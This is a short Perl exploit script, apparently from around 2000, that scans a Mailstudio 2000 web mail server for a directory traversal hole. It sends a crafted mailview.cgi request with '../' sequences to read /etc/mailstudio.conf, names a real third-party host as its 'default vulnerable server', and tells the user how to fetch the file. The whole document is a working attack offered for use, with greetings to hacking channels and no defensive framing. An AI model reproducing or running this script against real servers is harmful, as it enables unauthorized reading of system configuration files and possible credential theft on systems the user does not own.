#!/usr/bin/perl
# Mailstudio 2000 scanner by Zucco (zucco@netposta.net)
# Read the mailstudio config file.
# Other tricks: www.s0ftpj.org/docs/spj-004-000.txt 
# Thx: #hax on IRCnet, WHC, Crewlez, #r00tabega on Efnet, Diablo
$host = 'www.bsa.hu'; # default vulnerable server :)
$file = 'mailview.cgi?cmd=view&fldrname=inbox&select=1&html=../../../../../../etc/mailstudio.conf';

use IO::Socket;

$konn = IO::Socket::INET->new(Proto     => "tcp",
                              PeerAddr  => "$host",
                              PeerPort  => 80) ||
                die "Can't connect!";


print $konn "GET $file HTTP/1.0\n\n";

while(<$konn>) {
    chomp($f = $_);
    if ($f =~ /^HTTP\/1\.1\s200\sOK/i) {
      print "\t$host is vulnerable\n";
      print "\tRead the file: lynx $host/$file\n";
    }
}